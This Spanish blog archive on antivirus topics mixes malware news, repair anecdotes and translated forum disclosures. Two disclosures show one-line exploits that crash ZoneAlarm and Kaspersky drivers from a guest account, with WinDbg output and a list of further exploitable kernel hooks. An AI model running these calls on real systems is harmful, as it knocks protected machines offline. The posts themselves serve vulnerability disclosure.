Entradas etiquetadas con “antivirus” de Mixelandia

<Actualización>
He actualizado el fix para que termine la mayor cantidad de nombre posibles, pero no es seguroa, por lo tanto primero intenta con el fix, en caso de que no funcione entonces sigue leyendo y haz lo que dice la otra actualización.
Saludos
</Actualización>

Iniciare por poner el resultado que obtuve ayer en virustotal.com del archivo:

Pues resulta que pablo, un compa de Argentina me envio un link de un virus, que al checar en virus total me dio 0 de 30 es decir que no lo reconocia ningun antivirus.


 

El jueves pasado (27 de septiembre) corina me trajo una laptop que estaba infectada, chucky, segun ella, ese virus no se dejaba y no se que tana cosa...

bueno dijo que el virus se burlo de ella, cosa que no resulta rara pero bueno, a final de cuentas LeChuck.a, no fue pieza, y aunque termina algunos antivirus, y algunas otras herramientas, no lo hace por arte de magia, simplemete es un truquillo o dos, los cuales dare a continuación.

Primero lo primero, LeChuck esta codificado en VB 6, esta empaquetado con Petite 2.0, lo cual hasta cierto punto es tonto, ya que Petite 2.0 puede ser deshecho hasta con procdump, pero bueno sigamos,  contiene una Dll, la cual es winzip, empaquetada con UPX, sin modificar, lo cual me permitio ver que esa dll es inofensiva.

Hace unos momentos estaba yo muy tranquilo chateando con un amigo, y de repente me aparece una conversación de una amiga la cual me manda el siguiente mensaje:

    Moquita Bonita     dice:
oye voy a agregar esa foto a mi blog ya
    Moquita Bonita     envía:

    IMG-0012.zip
 
    Abrir (Alt+P)
     Mixel Adm:          Nomas no digas que no     Ya casi 25... fiestaaaaaaaa eaaaa      party://29.9.7.9:25 dice:
¿¿??¿?
 
  Has recibido satisfactoriamente C:\Documents and Settings\Administrador\Mis documentos\Mis archivos recibidos\IMG-0012.zip de     Moquita Bonita    .
 
     Mixel Adm:          Nomas no digas que no     Ya casi 25... fiestaaaaaaaa eaaaa      party://29.9.7.9:25 dice:
y eso que es ???
ha ya se virus

Este texto fue publicado por EP_X00F en los foros de sysinternals.

aqui

-- comienza traducción --

Hola

El troyano Rustock, acutalmente es uno de los malwares más avanzados tecnicamente. La uni ca parte que conforma esta troyano, se encuentra implementada en el modo kernel, así como su sistema de antidetección y su sistema de red.

Esta es una lista de las versiones disponibles de Rustocy y algunas de sus variantes (posiblemente no todas).


La mayoria de ellas fueron encontradas con la ayuda de herramientas HIDS gratuitas o con la ayuda de HIPS.


i386.sys
sysbus32.sys (2006)
wincom32.sys (2006?)

SSDT patching y IRP hooking

??windev.sys (2006?)

No hay información

pe386.sys (2006)


Hooking de la SYSCALL / ocultacion del driver.

mni41.sys (2006)*

*El driver puede tener un nombre aleatorio.

SSDT inline hooking, IRP hooking
Empaquetado con un protector polimórfico similar al de las versiones posteriores
Motor TCP/IP stack (firewalls sobrepasadas)
Eliminación de los competidores (ntio256.sys y runtime2.sys)

Como puede observarse, esta versión fue detectada apenas unos cuantos meses atras.


huy32.sys (2006)

Beta de Rustock.B
Contiene casi toda la funcionalidad de la versión principal

lzx32.sys (2006)

Actualmente es el rootkit de modo kernel mas avanzado que se a detectado
SYSCALL inline hooking
Utiliza ADS para ocultarse (diferentes variantes utilizan diferentes maneras para hacer esto)
motor TCP/IP stack  (firewalls sobrepasadas)
Sistema avanzado de antidetección (Contiene una lista negra de antirootkits - RKR, IceSword, DarkSpy, Blacklight, GMER)
Tanto el Dropper y el driver estan empaquetados con un protector avanzado.


Rustock.C (2006)
??Rustock.D (2007?)

Implementación en la parte profunda del kernel
Firewall y antivirus completamente sobrepasados
Autodefensa (DKOM y parcialmente DKOH)
Sistema Anti antirrotkits (los antirootkitys mas populares son sobrepasados)
Sistema Anti VM (las maquinas virtuales "VM" son detectadas y se evita la ejecución en estas)
Técnicas anti debugging
Empaquetador Polimórfico para drivers y droppers (unico, empaquetador + protector para drivers privado)

Para nosotros carece de todo sentido el proposito ("aspetos éticos" y otras mierdas ) con el que se haya desarrollado esta serie de troyanos y lo que este haciendo en la actualidad. Nosotros estamos interesados solamente en la propia tecnología de los rootkits, debido a que esta puede mejorar las habilidades de todos los antirootkits dessarrollados en estos momentos (RkU, gmer, IceSword).

Así que si alguine puede agragar algo más acerca de Rustock o alguno acerca de sus multiples variantes, estaremos muy felices de ello.

-- Termina traducción --

Saludos

Si alguna vez tienen algún problema de Spyware, adware o cualquiera de las modalidades del malware, no duden en llamar a un exorcista, o ya de perdida a su consultor local en tecnologías de la información, eso es lo que nos deja ver este anuncio gringo de publicidad.



Tambien adware y virus

Los pequeños demonios dentro de su computadora

conocidos por crear pop-ups
cambiar la configuración, robar su informacion personal
y hasta destruir su computadora.

XXXXX consuling
te tenemos protegido
"


que cosas no, yo ya estoy preparando mis balas de plata y mis crucifijos, pa' luchar contra el malware.

saludos

PandaLabs ha descubierto DreamSystem, un sistema para controlar varias variantes de la

familia de bots DreamSocks. la versión 1.3 de esta herramienta es la ultima que se conoce

y esta siendo vendida en varios foros por alrededor de 750 dollares. Por el dinero pagado

se incluyen actualizaciones gratuitas de nuevas versiones.

La herramienta consta de dos partees, La primera permite a los ciber-delincuentes controlar las maquinas comprometidas, convirtiéndolas en servidores, ingresando una URL en los bots,esto es para que se conecten a ella y comiencen a recibir ordenes. La segunda parte es la parte que permite enviar las ordenes a esas maquinas infectadas. Esta ultima ha sido encontrada en muchos foros, lo cual indica que hay varias botnet controladas por esta herramienta.

Los bots controlados mediante DreamSystem permiten que el atacante las convierta en zombies y también las utilice como servidores. Además también permite que el bot descargue y ejecute cualquier tipo de archivos, incluyendo otros códigos maliciosos.

En los foros donde se ha encontrado esta herramienta, esta se esta utilizando para lanzar ataques de Delegación de Servicio Distribuidos(DDoS por sus siglas en ingles) en contra de Servidores web. Esto puede ser en dos protocolos:UDP y TCP.

Los Ciber-delincuentes usan estos ataques para bloquear los servicios proporcionados por compañías que basan sus servicios en internet, -con las perdidas que esto acarrea-, si no pagan una cantidad para detener el ataque.


Las técnicas utilizadas para distribuir estas variantes de los bots van desde la utilización de exploits para infectar la maquina de usuarios, como Mpack o enviando spam con el bot como contenido.

Los hackers han desarrollado una nueva forma de engañar alos usuarios y que descarguen malware desde un sitio de descarga apocrifo de Adobe Shockwave Player.

la forma en que operan estos sitios es mostrando iconos especialmente formados, para hacer creer al usuario que su copia de Shockwave (si es que se encuentra instalado) no esta funcionando correctamente.

Todos los links apuntan a otro sitio el cual da un "diagnostico del problema", hay que actualizar el macromedia flash player. El usuario es redirigido a un sitio que se hacer pasar por el Centro de descarga del hockwave Player.

Por supuesto la descarga es un troyano, en vez del popular Flash player. Entre las características del sitio podemos encontrar que deshabilita el botón derecho del mouse.

Con la utilización de ingeniería social, en vez de utilizar permanentemente vulnerabilidades, tales como el iFrame en internet explorer, los hackers extienden los rangos de sus posibles víctimas.

El otro dia posteamos un exploit para KAV y ahora le toco el turno a Zone Alarm, un firewall muy usado por su servidor.
El post original esta en ingles aquí

ZoneAlarm Pro version:7.0.337.000
Driver version:7.0.337.000

Actualmente estamos trabajando con varios antivirus / firewalls y estamos probando la estabilidad de algunos de ellos . Lo cual muestra una muy mala situación. ;)

Todos adoran usar ganchos =), desafortunadamete el nivel de conocimiento de sus desarrolladores de drivers para el kernel deja mucho que desear. Simplemente no saben como manejar los ganchos en la SSDT.


Sistema: Windows XP SP2 sin PAE
Exploit: NtCreatePort pobre manejo del gancho, service id 46

NtCreatePort esta ganchada por las fucniones del driver vsdatant.sys.

Prototipo de la Función


NTSYSAPI
NTSTATUS
NTAPI
NtCreatePort(
OUT PHANDLE PortHandle,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN ULONG MaxDataSize,
IN ULONG MaxMessageSize,
IN ULONG Reserved
);


Aquí estan un pequeño exploit que conduce a un pantallazo azul.
Este exploit puede ser iniciado dsede la cuenta de invitado con derechos minimos.


NtCreatePort(nil, pointer($81234567), 0, 0, 0);


Y aquí esta el analisis de este BSOD

Originally posted by windbg


kd> !analyze -v
*******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: 8123456f, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: fbfdd256, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)

Debugging Details:
------------------

ANALYSIS: Kernel with unknown size. Will force reload symbols with known size.
ANALYSIS: Force reload command: .reload /f ntoskrnl.exe=FFFFFFFF804D7000,214600,41108004
***** Kernel symbols are WRONG. Please fix symbols to do analysis.


FAULTING_MODULE: 804d7000 nt

DEBUG_FLR_IMAGE_TIMESTAMP: 45f0fed1

READ_ADDRESS: unable to get nt!MmSpecialPoolStart
unable to get nt!MmSpecialPoolEnd
unable to get nt!MmPoolCodeStart
unable to get nt!MmPoolCodeEnd
8123456f

FAULTING_IP:
vsdatant+33256
fbfdd256 8b4808 mov ecx,dword ptr [eax+8]

MM_INTERNAL_CODE: 0

CUSTOMER_CRASH_COUNT: 4

DEFAULT_BUCKET_ID: WRONG_SYMBOLS

BUGCHECK_STR: 0x50

LAST_CONTROL_TRANSFER: from 804df06b to fbfdd256

STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
fc65bd48 804df06b 00000000 81234567 00000000 vsdatant+0x33256
fc65bd64 7c90eb94 badb0d00 0012fe10 00000000 nt+0x806b
fc65bd68 badb0d00 0012fe10 00000000 00000000 0x7c90eb94
fc65bd6c 0012fe10 00000000 00000000 00000000 0xbadb0d00
fc65bd70 00000000 00000000 00000000 00000000 0x12fe10


STACK_COMMAND: kb

FOLLOWUP_IP:
vsdatant+33256
fbfdd256 8b4808 mov ecx,dword ptr [eax+8]

SYMBOL_STACK_INDEX: 0

SYMBOL_NAME: vsdatant+33256

FOLLOWUP_NAME: MachineOwner

MODULE_NAME: vsdatant

IMAGE_NAME: vsdatant.sys

BUCKET_ID: WRONG_SYMBOLS

Followup: MachineOwner
---------



Otro exploit con la misma técnica para el mismo firewall.


Sistema: Windows XP SP2 sin PAE
Exploit: NtCreateWaitablePort, service id 56

NtCreateWaitablePort es otra función ganchada por el driver.

Function prototype

NTSYSAPI
NTSTATUS
NTAPI
NtCreateWaitablePort(
OUT PHANDLE PortHandle,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN ULONG MaxDataSize,
IN ULONG MaxMessageSize,
IN ULONG Reserved
);



Este exploit puede ser iniciado dsede la cuenta de invitado con derechos minimos.

NtCreateWaitablePort(nil, pointer($81234567), 0, 0, 0);


Esto lleva inmediatamente a un BSOD


analisis en windbg


kd> !analyze -v
*******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: 8123456f, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: fbfdd336, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)

Debugging Details:
------------------

ANALYSIS: Kernel with unknown size. Will force reload symbols with known size.
ANALYSIS: Force reload command: .reload /f ntoskrnl.exe=FFFFFFFF804D7000,214600,41108004
***** Kernel symbols are WRONG. Please fix symbols to do analysis.


FAULTING_MODULE: 804d7000 nt

DEBUG_FLR_IMAGE_TIMESTAMP: 45f0fed1

READ_ADDRESS: unable to get nt!MmSpecialPoolStart
unable to get nt!MmSpecialPoolEnd
unable to get nt!MmPoolCodeStart
unable to get nt!MmPoolCodeEnd
8123456f

FAULTING_IP:
vsdatant+33336
fbfdd336 8b4808 mov ecx,dword ptr [eax+8]

MM_INTERNAL_CODE: 0

CUSTOMER_CRASH_COUNT: 5

DEFAULT_BUCKET_ID: WRONG_SYMBOLS

BUGCHECK_STR: 0x50

LAST_CONTROL_TRANSFER: from 804df06b to fbfdd336

STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
f89ded48 804df06b 00000000 81234567 00000000 vsdatant+0x33336
f89ded64 7c90eb94 badb0d00 0012fe10 f90f5d98 nt+0x806b
f89ded68 badb0d00 0012fe10 f90f5d98 f90f5dcc 0x7c90eb94
f89ded6c 0012fe10 f90f5d98 f90f5dcc 00000000 0xbadb0d00
f89ded70 f90f5d98 f90f5dcc 00000000 00000000 0x12fe10
f89ded74 f90f5dcc 00000000 00000000 00000000 0xf90f5d98
f89ded78 00000000 00000000 00000000 00000000 0xf90f5dcc


STACK_COMMAND: kb

FOLLOWUP_IP:
vsdatant+33336
fbfdd336 8b4808 mov ecx,dword ptr [eax+8]

SYMBOL_STACK_INDEX: 0

SYMBOL_NAME: vsdatant+33336

FOLLOWUP_NAME: MachineOwner

MODULE_NAME: vsdatant

IMAGE_NAME: vsdatant.sys

BUCKET_ID: WRONG_SYMBOLS

Followup: MachineOwner
---------



Estamo seguros que existen otros ganchos codificados de una manera deficiente, mas ya no seguimos probando otros.


Saludos
EP_X0FF/UG North

Programas antivirus de varias compañías de nivel mundial han fallado en la mayor prueba de malware la VB100

Los productos de Kaspersky, Grisoft, y F-Secure han fallado en detectar el 100% del malware que se encuentran en la base de datos de Virus Bulletin, anqué en alguna ocasión ya habían pasado esta prueba.

De los 37 productos probados, 10 fallaron al momento de demostrar sus habilidades de detección necesitarías para obtener la certificación VB100.

Kaspersky Anti-Virus 6.0.2.621 fallo en detectar el gusano de internet llamado allaple. De acuerdo con el consultor de tecnología de Kaspersky, David Emm, Kaspersky había agregado la firma para el gusano en Febrero. Sin embargo al momento de la prueba, Kaspersky se encontraba "optimizando" la firma del allape, y la firma no se encontraba en la base de datos de Kaspersky.

Grisoft AVG 7.5 professional Edition también fallo en el VB100. AVG es una aplicación antimalware gratuita muy conocida, que tiene una gran aceptación.

Larry Bridwellm el estratega general de seguridad de Grisoft, dijo que la parte de este anti-malware, AVG 7.5 Professional Edition, que detecta firmas ha fallado al detectar una de las variantes del Troyano Agobot, pero que la parte anti-spyware del producto lo había detectado. "Las pruebas son al momento de accesar los archivos a nivel hardware" comento Bridwell. Cuando se probo el AVG 7.5 Professional Edition, encontramso el bot en la parte del anty spyware, la cual es sobre demanda [el programa tiene que iniciarse de forma manual]. Deberíamos de haber detectado el malware al momento del acceso.

Al igual que Kaspersky el servicio de protección para clientes de F-Secure (7.00 buil 387) fallo al detectar el Allaple. La compañía dijo que había cometido un error al no enviar las últimas actualizaciones de su base de datos. "El producto enviado a la prueba no incluía las ultimas actualizaciones", comentó F-Secure. "El programa que probado off line, lo cual no permitió al programa actualizarse a la ultima versión en la base de datos. En el ambiente del usuario normal la base de datos se hubiera actualizado de manera automática.

Todas estas pruebas fueron realizadas en Windows XP.

Esta es una traducción de una entrada que hizo el buen EP_X0FF en los foros de sysinternals
y que pueden leer en ingles aquí

El bien conocido antivirus Kaspersky, desde hace un buen tiempo sufre de un bug muy peligroso, el cual permite tronar el sistema protegido por este antivirus, aun desde la cuenta de invitado.

Todos los intentos de avisar a Kaspersky Lab sobre esta vulnerabilidad han sido ignorados. Este material fue mostrado varios años atras, y en el ultimo verano publicamos un nuevo exploit para Kaspersky AV 6.0 el cual se basa en los descubrimientos previos de Ms-Rem. Y despues de este tiempo nada ha cambiado. Aun ahora con la nueva version Kaspersky AV 7.0 este exploit sigue funcionando muy bien.
El objetivo principal de este exploit es hacer una llamda a NtOpenProcess con parametros invalidios. Esta funcion esta intervenida (hooked) por el diver de Kaspersky llamdo klif.sys y la reazon para este intercepción es obia - Esta es la manera en que Kaspersky AV se protege de accesos no autorizados que pudieran cerrar el proceso, esto es muy usado por el malware.

Aqui el prototipo de esta función

NTSYSAPI
NTSTATUS
NTAPI
NtOpenProcess( OUT PHANDLE ProcessHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN PCLIENT_ID ClientId OPTIONAL );


Aquí un pequeño exploit codificado en pascal(funciona para el klif.sys vesion 6.12.10.280 y versiones previas)


var
ob1: OBJECT_ATTRIBUTES;
p1: DWORD;
begin
ob1.Length := sizeof(ob1);
NtOpenProcess(@p1, PROCESS_QUERY_INFORMATION, @ob1, pointer($82000000));
end;

Como podran ver el ultimo parametro es la dirección de la estructura CLIENT_ID, la cual apunta hacia una región aleatoria dentro de la memoria del kernel.
al probar el xploit en una instalación limpia de windows XP , sin KAV -no hay BSOD(Blue Screen Of Death o Pantallazo azul).

Al ejecutarlo en un Windows XP protegido por KAV 7.0 -inmediatamente tenemos un BSOD - PAGE_FAULT_IN_NONPAGED_AREA.

Pero ¿Porque pasa esto? la respuesta es muy sencilla. Supongo que el codigo fuente de el hook en NtOpenProcess es algo como esto:

NTSTATUS NewNtOpenProcess (
OUT PHANDLE ProcessHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN PCLIENT_ID ClientId OPTIONAL)
{
__try
{

if (ClientId->UniqueProcess == KasperskyProcesss) return STATUS_ACCESS_DENIED;

else return RealNtOpenProcess(ProcessHandle, DesiredAccess,
ObjectAttributes, ClientId);
__except (EXCEPTION_EXECUTE_HANDLER)
{
... stuff here ...
}
}

El gran problema aquí es ClientId->UniqueProcess, ya que ClientId es un PUNTERO a una estructura. El hecho de accesar a una región invalida de memoria produce inmediatamente un PAGE_FAULT_IN_NONPAGED_AREA.


el exploit original fue creado por Ms-Rem y luce así


NtOpenProcess(NULL, (HANDLE)0, NULL, NULL);

Comopodras observar los desarrolladores de KAV han usado un bloque try/except, y parece ser que no saben usar otro tipo de funciones manejadoras de erores.

Esperemos que los desarrolladores de Kaspersky Antivirus descubran el fabuloso programa llamado NtCall y corrigan su bug.


*******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: 83000000, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: f941840c, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)

Debugging Details:
------------------

ANALYSIS: Kernel with unknown size. Will force reload symbols with known size.
ANALYSIS: Force reload command: .reload /f ntoskrnl.exe=FFFFFFFF804D7000,214600,41108004
***** Kernel symbols are WRONG. Please fix symbols to do analysis.

***** Kernel symbols are WRONG. Please fix symbols to do analysis.


MODULE_NAME: klif

FAULTING_MODULE: 804d7000 nt

DEBUG_FLR_IMAGE_TIMESTAMP: 46260f1c

READ_ADDRESS: unable to get nt!MmSpecialPoolStart
unable to get nt!MmSpecialPoolEnd
unable to get nt!MmPoolCodeStart
unable to get nt!MmPoolCodeEnd
83000000

FAULTING_IP:
klif+1940c
f941840c 0fbe08 movsx ecx,byte ptr [eax]

MM_INTERNAL_CODE: 0

CUSTOMER_CRASH_COUNT: 1

DEFAULT_BUCKET_ID: WRONG_SYMBOLS

BUGCHECK_STR: 0x50

LAST_CONTROL_TRANSFER: from f941b39a to f941840c

STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
f64c8d24 f941b39a 83000000 00000008 00000000 klif+0x1940c
f64c8d64 7c90eb94 badb0d00 0012f3e4 00000000 klif+0x1c39a
f64c8d68 badb0d00 0012f3e4 00000000 00000000 0x7c90eb94
f64c8d6c 0012f3e4 00000000 00000000 00000000 0xbadb0d00
f64c8d70 00000000 00000000 00000000 00000000 0x12f3e4


STACK_COMMAND: kb

FOLLOWUP_IP:
klif+1940c
f941840c 0fbe08 movsx ecx,byte ptr [eax]

SYMBOL_STACK_INDEX: 0

FOLLOWUP_NAME: MachineOwner

IMAGE_NAME: klif.sys

SYMBOL_NAME: klif+1940c

BUCKET_ID: WRONG_SYMBOLS

Followup: MachineOwner

Algunos descubrimientos hechos por UG North muestran que hay otras funciones que tambien estan intervenidas por klif.sis las cuales pueden ser explotadas con ataques similares.

Lista de entradas en la SSDT explotables (Windows XP / KAV 7.0.0.55)

==================================
|[Idx] [nombre de la función] |
==================================
|[41 ] NtCreateKey
|[47 ] NtCreateProcess
|[48 ] NtCreateProcessEx
|[50 ] NtCreateSection
|[52 ] NtCreateSymbolicLinkObject
|[53 ] NtCreateThread
|[65 ] NtDeleteValueKey
|[99 ] NtLoadKey2
|[119] NtOpenKey
|[122] NtOpenProcess
|[125] NtOpenSection
|[177] NtQueryValueKey
==================================
Cualquier llamada a esas funciones con parametros invalidos, llevara a un BSOD.

Este tipo de exploit fue descubierto por Ms-Rem en el 2005 y funciona para KAV 5.0

Como se mostro este exploit funciona para todas la versiones de Kaspersky Antivirus incluyendo la nueva versión 7.0.

¿Realmente aun crees quie estas portegido?

Hace unos días llego al negocio un cliente diciendo que su maquina no quería arrancar,que al momento de llegar al login, la computadora se reseteaba sin mas ni menos, por lo cual procedí a investigar el caso. Los síntomas que presentaban eran del clásico fallo de un driver, en pocas palabras el horrendo Pantallazo azul, el cual decía que amon.sys había provocado un fallo grave...
A estas alturas ya tenia el nombre del culpable,y la solución, desinstalar NOD32, hay que recordar que el archivo amon.sys corresponde al driver que instala NOD 32 encargado de la monitorización del sistema.
Inicie la maquina, configure el sistema operativo para entrar en modo a prueba de fallos y desinstale el NOD 32. Acto seguido resetie la computadora y listo esta entro sin ningún problema.
Después de reiniciar, reinstale el NOD32 y comencé a actualizarlo, esto tardo algún tiempo, ya que fueron un poco más de 6MB y di inicio a el scaner del sistema.....
Bien yo no sabia si llorar o correr o de plano ponerme a gritar con lo que el escaneo arrojó... esa maquina tenia una cantidad de virus, que siendo sincero nunca había visto en un sistema con antivirus (y creanme que he visto cosas que son difíciles de creer a nivel computación).

Una vez que termine de limpiar la máquina y reiniciar, suponía que la pesadilla había terminado o por lo menos eso deseaba yo.....

al día siguiente un cliente al que le habíamos cambiado un modulo de memoria RAM no hablo para decirnos que tenia un problema (a lo cual yo pensé "Felicidades yo tengo mucho y no me quejo") que la maquina a la que le habíamos puesto el modulo de RAM se apagaba antes de que pudieran entrar...
me Lo primero que pensé fue bolas, el modulo de RAM salio dañado... y pus hay voy con mis discos para checar la RAM, el hardware y cuanta cosa pudiera fallar. Al momento de arrivar inicie el procedimiento de revisión de la memoria RAM y pues el resultado no daba lugar a dda, el modulo de RAM estaba funcionando bien.... Entonces encendí la computadora, y al momento de llegar al login, bang que esta se resetea y sin decir nada osea que no mostró su pantallazo... Bien entre en modo a prueba de fallos y configure para que no se reiniciara estomáticamente, lo cual permitió ver que en efecto el culpable era otra vez "Amon.sys".
En este punto ya las cosas no se ven muy alentadoras, y pues le volví a aplicar l misma medicina, desinstalar el NOD y volverlo a instalar, actualizarlo y darle una pasada de bajo nivel al sistema. El resultado.. pues unos 20 archivos infectados más o menos...

Pero esto empezó ha tornarse epidémico el día de hoy, cuando una de las máquinas del ciber comenzó a mostrar los mismos síntomas... se reiniciaba en el login...

no dude en que fuera lo mismo y acerté, tras la desinstalación del nod 32 la compu funciono...

esta vez me tome la molestia de ver quienes eran los culpable y aquí se los dejo a continuación

Win32/Trojandownloader.Small.AVT.
Win32/Trojandownloader.Neurech.nbc
Win32/NUWAR.GEN (Gusano) //Este ultimo lo encontró por medio de la heurística o lo que es lo mismo no esta en la base de datos de definiciones....

en la ultima compu solo hubo 7 archivos infectados, por lo tanto no hay a quien más echarle la culpa...

Así que si son usuarios de NOD 32 y su computadora no arranca o más bien se resetea al momento de iniciar, la medicina es desinstalar el nod y volverlo a instalar, actualizarlo y hacer un escaneo profundo....

por cierto en todos los casos l puerta por la que entraron todos los virus fue si adivinaron Internet Explorer...

Espero que esto les sirva a ustedes tanto como a Mi.

Un saludo

Después de que libere la primer versión del limpiador de memorias, pude observasr varios detalles, el primero y mas primordial para mi fue que no tenia soporte para el brontok, el cual no infecta las memorias de la misma manera que los demás.

Pues bien después de varios días de retroalimentación en los foros de ba-k.com, hice algunos cambios al programa que enlisto a continucación:
agregado: detección y eliminación del brontok en las memorias usb
corregido: bug que hacia que el programa se trabara si el autorun.inf estaba vació o mal formado.
agregado: un espacio donde el programa arroja resultados.
mejorado: se mejoro un poco el aspecto del programa en general y se quito ese horrible icono amarillo.

espero que si alguien encuentra un error me lo haga saber, ya sea dejando un comentario o cualquier cosa que ustedes deseen.

y si les sirve, ayudenme colocando un link a este blog o a esta página en especial.

Descargate el programa aquí

Saludos.